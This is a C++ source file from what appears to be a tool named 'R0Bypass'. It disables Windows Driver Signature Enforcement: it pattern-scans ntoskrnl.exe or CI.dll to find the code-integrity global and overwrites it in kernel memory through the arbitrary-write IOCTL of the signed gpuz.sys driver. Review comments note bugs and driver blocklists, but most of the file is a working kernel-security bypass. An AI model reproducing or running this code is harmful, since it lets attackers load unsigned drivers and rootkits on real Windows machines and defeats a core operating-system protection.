/R0Bypass/GPUZ/GPUZ/sys.cpp


  1. #include "Global.h"
  2. #define CI_DLL "ci.dll"
  3. #define CI_PATTERN "89 0D ? ? ? ? 49 8B F8"
  4. #define NTOS_EXE "ntoskrnl.exe"
  5. #define NTOS_PATTERN "C6 05 ? ? ? ? ? 8D 7B 06"
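/* Initialization Routine */
sys::sys(uint32_t BuildNumber)
    : dwBuildNumber(BuildNumber)
{
    // Builds before 7601 (Windows 7 SP1) are rejected outright; the patterns
    // and patch values further down are only defined from there on.
    if (BuildNumber < 7601)
        throw std::runtime_error("OS Not Supported.");

    // gpuz wraps the gpuz.sys IOCTLs used for reading/writing system memory.
    // Plain `new` throws std::bad_alloc instead of returning null, so the check
    // below is defensive only and kept for the original error message.
    Driver = new gpuz();
    if (Driver == nullptr)
        throw std::runtime_error("gpuz Class Object Is Not Initialized.");

    // A constructor that throws never runs ~sys(), so a failure while locating
    // the CI variable must release Driver here or the object (and whatever
    // device handle gpuz opened) is leaked.
    try
    {
        // NOTE(review): the 0x100000000 subtraction is not explained anywhere
        // in this file. QueryVar() zero-extends a 32-bit RIP-relative
        // displacement before adding it, so this looks like a compensation for
        // a *negative* displacement (and would be wrong for a positive one).
        // Confirm against the gpuz wrapper before changing either site.
        g_CiVar = QueryVar() - 0x100000000;
    }
    catch (...)
    {
        delete Driver;
        Driver = nullptr;
        throw;
    }
}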
/* Call to gpuz.sys to patch the global system variable */
BOOLEAN sys::DisableDSE()
{
    std::cout << "Disabling DSE...\n";

    // Pre-9200 builds (Windows 7) patch the byte flag found in ntoskrnl.exe;
    // later builds patch the option value found in CI.dll. 0 and 8 are the
    // "disabled" values this tool writes for each case.
    uint32_t disabledValue;
    if (dwBuildNumber < 9200)
        disabledValue = 0;
    else
        disabledValue = 8;

    // NOTE(review): this is always a 4-byte write. On Windows 7 the located
    // global is the byte operand of a `mov byte ptr` (NTOS_PATTERN starts with
    // C6 05), so the three bytes following it are overwritten as well. Check
    // that WriteSystemAddress<> honours sizeof(T) and consider a uint8_t write
    // for the pre-9200 case.
    // The write itself goes through a third-party signed driver's IOCTL that
    // exposes arbitrary kernel memory access; drivers like that are what
    // vendor driver blocklists are built for, so expect this to be blocked or
    // flagged on hardened hosts.
    return Driver->WriteSystemAddress<uint32_t>(g_CiVar, disabledValue);
}
/* Call to gpuz.sys to re enable DSE */
BOOLEAN sys::EnableDSE()
{
    std::cout << "Enabling DSE...\n";

    // Counterpart of DisableDSE(): 1 for the Windows 7 byte flag in
    // ntoskrnl.exe, 6 for the CI.dll option value on 9200 and later.
    const bool legacyKernelFlag = dwBuildNumber < 9200;
    const uint32_t enabledValue = legacyKernelFlag ? 1u : 6u;

    // NOTE(review): these are fixed constants, not the value that was in place
    // before DisableDSE() ran. If the machine had a different setting, this
    // "restore" silently replaces it. Saving the original value in
    // DisableDSE() would be the robust fix; the gpuz wrapper is described as
    // supporting reads, but no read call is visible in this file.
    return Driver->WriteSystemAddress<uint32_t>(g_CiVar, enabledValue);
}
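/* Releases the gpuz wrapper created in the constructor. */
sys::~sys()
{
    // The original called Driver->~gpuz() directly, which runs the destructor
    // but never frees the allocation made with `new` (and is undefined if
    // Driver is null). `delete` does both and is a no-op on nullptr.
    delete Driver;
    Driver = nullptr;
}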
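/*
 * Locates the kernel address of the code-integrity global to patch.
 *
 * The on-disk image (ntoskrnl.exe on Windows 7, CI.dll afterwards) is mapped
 * into this process, scanned for a RIP-relative store to the global, and the
 * resulting offset is rebased onto the address the kernel loaded the image at.
 *
 * Throws std::runtime_error on any failure. The mapping is released on every
 * exit path; the original only freed it on success.
 */
uint64_t sys::QueryVar()
{
    // Scope guard for the user-mode mapping so the throws below cannot leak it.
    struct MappedModule
    {
        HMODULE handle = nullptr;
        ~MappedModule()
        {
            if (handle)
                FreeModule(handle);
        }
    } mapped;

    uint64_t SystemImageBase = 0;

    // Build "<system dir>\<image>". GetSystemDirectoryA returns 0 on failure,
    // which the original ignored.
    if (GetSystemDirectoryA(szSystemPath, MAX_PATH) == 0)
        throw std::runtime_error("Could Not Get System Directory.");
    strcat_s(szSystemPath, "\\");

    /* Initialize Dynamic Data */
    if (dwBuildNumber < 9200) // Windows 7
    {
        ImageName = NTOS_EXE;           // Global Variable Is Located In ntoskrnl.exe
        VariablePattern = NTOS_PATTERN; // x64 `C6 05 disp32 imm8` = mov byte ptr [rip+disp32], imm8
        AddressOffset = 7;              // length of that instruction (RIP-relative base)
    }
    else // Rest of the supported OS
    {
        ImageName = CI_DLL;             // Global Variable Is Located In CI.dll
        VariablePattern = CI_PATTERN;   // x64 `89 0D disp32` = mov [rip+disp32], ecx
        AddressOffset = 6;              // length of that instruction
    }
    strcat_s(szSystemPath, ImageName);

    // Map the image without running its entry point; the instruction bytes and
    // displacement are identical to the kernel's copy, only the base differs.
    mapped.handle = LoadLibraryExA(szSystemPath, NULL, DONT_RESOLVE_DLL_REFERENCES);
    if (!mapped.handle)
        throw std::runtime_error("Cannot Load System Image.");
    if (!GetModuleInformation(GetCurrentProcess(), mapped.handle, &ModInfo, sizeof(ModInfo)))
        throw std::runtime_error("Could Not Get Module Information.");

    auto& utils = Utils::instance();
    const uint64_t mappedBase = reinterpret_cast<uint64_t>(ModInfo.lpBaseOfDll);
    const uint64_t instrAddress = utils.FindPattern(mappedBase, ModInfo.SizeOfImage, VariablePattern, 0);
    if (!instrAddress)
        throw std::runtime_error("Could Not Find System Module Address.");

    // disp32 sits two bytes into both patterns (after opcode + ModRM).
    // NOTE(review): read as uint32_t, as in the original, so a negative
    // displacement is zero-extended when added below. The constructor's
    // "- 0x100000000" appears to compensate for exactly that; switching this to
    // int32_t must be done together with that site, not here alone.
    const uint32_t relative = *reinterpret_cast<const uint32_t*>(instrAddress + 2);

    // RIP-relative target = end of instruction + displacement, expressed as an
    // offset from the user-mode mapping base ...
    const uint64_t variableOffset = instrAddress + relative + AddressOffset - mappedBase;

    // ... then rebased onto the address the kernel actually loaded the image at.
    if (!GetSystemImageInformation(ImageName, &SystemImageBase))
        throw std::runtime_error("Could Not Get System Image Information.");
    return SystemImageBase + variableOffset;
}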
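/*
 * Queries OS Loaded System Modules.
 *
 * Looks up SystemModuleName (file name only, compared both as given and
 * lower-cased) in the kernel's loaded-module list and stores its ImageBase.
 * Returns FALSE, leaving *ImageBase untouched, if the query fails or no
 * module matches.
 */
BOOLEAN sys::GetSystemImageInformation(const char* SystemModuleName, uint64_t* ImageBase)
{
    // Class 11 is SystemModuleInformation.
    PRTL_PROCESS_MODULES pModInfo =
        static_cast<PRTL_PROCESS_MODULES>(GetSystemInformation(static_cast<SYSTEM_INFORMATION_CLASS>(11)));

    // The original read NumberOfModules before testing the pointer, so a failed
    // query dereferenced null; bail out first.
    if (!pModInfo)
        return FALSE;

    auto& utils = Utils::instance();
    BOOLEAN found = FALSE;

    // Walk from the last entry backwards, as the original did, so the last
    // matching entry wins if a name appears twice.
    ULONG idx = pModInfo->NumberOfModules;
    while (idx > 0 && !found)
    {
        --idx;
        // Copied rather than referenced on purpose: ToLower's contract is not
        // visible here, and a copy shields the list from any in-place edit.
        RTL_PROCESS_MODULE_INFORMATION entry = pModInfo->Modules[idx];
        char* fileName = reinterpret_cast<char*>(&entry.FullPathName[entry.OffsetToFileName]);

        char* lowered = utils.ToLower(fileName); // heap-allocated; freed below
        found = !strcmp(lowered, SystemModuleName) || !strcmp(fileName, SystemModuleName);
        free(lowered);

        if (found)
            *ImageBase = reinterpret_cast<uint64_t>(entry.ImageBase);
    }

    VirtualFree(pModInfo, 0, MEM_RELEASE);
    return found;
}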
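/*
 * Call To Native QuerySystemInformation To Get SystemModuleInformation.
 *
 * Returns a VirtualAlloc'd buffer holding the requested information class,
 * which the caller must release with VirtualFree(..., 0, MEM_RELEASE), or
 * nullptr on failure (the reason is printed to stdout).
 */
PVOID sys::GetSystemInformation(SYSTEM_INFORMATION_CLASS InfoClass)
{
    // A zero-length call only reports the size the kernel currently needs.
    ULONG RetLen = 0;
    NTSTATUS status = NtQuerySystemInformation(InfoClass, NULL, 0, &RetLen);
    if (status != STATUS_INFO_LENGTH_MISMATCH)
    {
        std::cout << "Status: " << std::hex << status << std::dec << std::endl;
        return nullptr;
    }

    // That size can be stale by the time the real query runs (a module may
    // load in between), in which case the kernel answers
    // STATUS_INFO_LENGTH_MISMATCH again. The original gave up at that point;
    // retry with the newly reported size a bounded number of times.
    const int maxAttempts = 4;
    for (int attempt = 0; attempt < maxAttempts; ++attempt)
    {
        PVOID pBuffer = VirtualAlloc(NULL, RetLen, MEM_COMMIT, PAGE_READWRITE);
        if (!pBuffer)
        {
            std::cout << "Could not allocate buffer\n";
            return nullptr;
        }

        ULONG needed = RetLen;
        status = NtQuerySystemInformation(InfoClass, pBuffer, RetLen, &needed);
        if (NT_SUCCESS(status))
            return pBuffer;

        VirtualFree(pBuffer, 0, MEM_RELEASE);
        if (status != STATUS_INFO_LENGTH_MISMATCH)
            break;

        // Grow to what the kernel now reports; if it reported nothing larger,
        // add a page so the loop cannot spin on the same size.
        RetLen = needed > RetLen ? needed : RetLen + 0x1000;
    }

    // std::hex is sticky on std::cout; reset it so later output is not affected.
    std::cout << "Could not query info. Status: " << std::hex << status << std::dec << std::endl;
    return nullptr;
}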